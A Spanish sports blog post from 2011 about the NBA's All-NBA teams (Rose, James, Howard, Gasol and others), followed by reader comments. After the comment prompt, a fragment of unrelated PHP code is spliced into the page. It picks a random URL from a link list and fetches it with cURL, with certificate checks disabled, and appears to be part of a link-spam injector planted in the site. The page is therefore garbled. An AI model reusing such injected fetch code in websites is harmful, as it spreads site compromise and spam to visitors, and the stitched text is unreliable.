Quintetos de la temporada

13 de May de 2011 por txusma

Derrick Rose, Lebron James y Dwight Howard han dominado las votaciones para la elección de los quintetos de la temporada. De hecho, nadie ha puesto en duda que el alero de los Heat debía estar en el mejor quinteto. A su lado, Kobe Bryant y Kevin Durant como vaticinábamos la mayoría de seguidores de la NBA.

En el segundo quinteto, y después de estar en el tercero dos años consecutivos, aparece Pau Gasol. El español ha cuajado una de las mejores temporadas de su carrera mostrando nivel de MVP en las primeras semanas del curso. No hemos de dejar que los pobres playoffs que se ha marcado eviten valorar en su justa medida todo el año en su conjunto. Gasol acompaña a Dirk Nowitzki, Dwyane Wade, Amare Stoudamire y Russell Westbrook en este segundo escalón. El base de los Thunder aparece en estos quintetos por primera vez en su carrera.

En el tercero quedan Chris Paul, Manu Ginobili, Lamarcus Aldridge, Zach Randolph y Al Horford. Los 3 últimos, que han cuajado excelentes temporadas, reciben por primera vez el premio de la nominación.

Comenta

6 comentarios a esta entrada

  1. HeiNeKeN dice:
    #1

    Increible que Ginobili no hubiese estado antes en ninguno de los quintetos…

      Citar

  2. Txusma dice:
    #2

    Ui! Error! Ginobili sí que había estado ya en un tercer quinteto. Era Lamarcus el que no.

      Citar

  3. HeiNeKeN dice:
    #3

    Ya me decia yo que me sonaba raro xD.

    Me parece interesante el que Durant no este en ninguno de los 3, tan “mala” temporada ha realizado??

      Citar

  4. Txusma dice:
    #4

    Durant está en el primer quinteto, al ladito de Kobe Bryant 😉

      Citar

  5. HeiNeKeN dice:
    #5

    Bua, esto de leer cosas nada más levantarme de la siesta xD.

      Citar

  6. minixaxo dice:
    #6

    A mí lo que me llama la atención es Blake Griffin. Pese a ser rookie, es el único jugador en toda la Liga con un 20-10 y lo ha adornado con 3 asistencias. Cierto es que el bajón tras el All-Star ha sido llamativo, pero veo más justificada su presencia que la de Al Horford que, a pesar de haber hecho una gran temporada, no es ni de lejos como la del ex de Oklahoma State.

    La otra cosa que me llama la atención es que Kobe esté en el primer quinteto cuando Wade ha hecho mejor temporada que él y me falta Nowitzki en el primer quinteto, pero estando James y Durant en el primero quizás no es tan llamativo como los dos primeros errores.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>